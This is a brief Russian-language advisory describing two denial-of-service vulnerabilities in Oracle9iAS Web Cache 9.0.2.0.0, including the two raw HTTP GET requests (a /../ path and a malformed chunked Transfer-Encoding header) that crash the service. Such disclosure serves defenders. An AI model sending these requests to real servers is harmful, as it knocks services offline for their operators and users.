Oracle Web Cache — часть Oracle Application Server. Web Cache server используется для кэширования запросов Web сервера. Обнаружено две возможности отказа в обслуживании, которые приведут к краху Web Cache службы. Обе уязвимости могут эксплуатироваться простым HTTP запросом. 

1. HTTP GET запрос, содержащий хотя бы одну последовательность /../, приведет к аварийному завершению работы службы: 

GET /../ HTTP/1.0 
Host: whatever 
[CRLF] 
[CRLF] 

2. Некорректный HTTP GET запрос приведет к краху Web Cache: 

GET / HTTP/1.0 
Host: whatever 
Transfer-Encoding: chunked 
[CRLF] 
[CRLF] 

Уязвимость обнаружена в Oracle9iAS Web Cache 9.0.2.0.0.



Оставить мнение